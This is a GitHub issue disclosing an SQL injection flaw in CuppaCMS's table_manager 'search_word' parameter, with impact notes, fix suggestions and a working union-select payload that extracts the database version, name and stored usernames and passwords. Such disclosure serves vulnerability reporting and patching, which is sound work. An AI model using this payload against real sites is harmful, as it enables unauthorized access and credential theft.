Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters. #13

Open
truonghuuphuc opened this issue Jan 3, 2022 · 1 comment

Comments

@truonghuuphuc
Copy link

truonghuuphuc commented Jan 3, 2022

  • VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
    “/administrator/components/table_manager/" via the ‘search_word’ parameters.
  • Date: 3/1/2022
  • Exploit Author: Trương Hữu Phúc
  • Contact me:
  • Github: https://github.com/truonghuuphuc
  • Email: phuctruong2k@gmail.com
  • Product: CuppaCMS
  • Description: The vulnerability is present in the “/administrator/components/table_manager/" , and can
    be exploited throuth a POST request via the ‘search_word’ parameters.
  • Impact: Allow attacker inject query and access , disclosure of all data on the system.
  • Suggestions: User input should be filter, Escaping and Parameterized Queries.
  • Payload:
    search_word=') union all select concat('version:',version(),'<br>'),concat('database:',database(),'<br>'),group_concat('username:',username,'<br>','password:',password),4,5,6,7,8 from cu_users-- -
  • Proof of concept (POC):
    image
  • You can see injection code query into search_word parameters as show below
  • Request:
    image
  • You see version , database and data as show below
  • Response:
    image
  • Request and Response:
    image
  • Report:
    Report.pdf
@truonghuuphuc truonghuuphuc changed the title VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters VULNERABLE: SQL injection vulnerability exists in CuppaCMS Jan 10, 2022
@truonghuuphuc truonghuuphuc changed the title VULNERABLE: SQL injection vulnerability exists in CuppaCMS VULNERABLE: SQL injection vulnerability exists in CuppaCMS “/administrator/components/table_manager/" via the ‘search_word’ parameters. Jan 29, 2022
@waseeld
Copy link

waseeld commented Feb 3, 2022

any updates about this issue ??

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants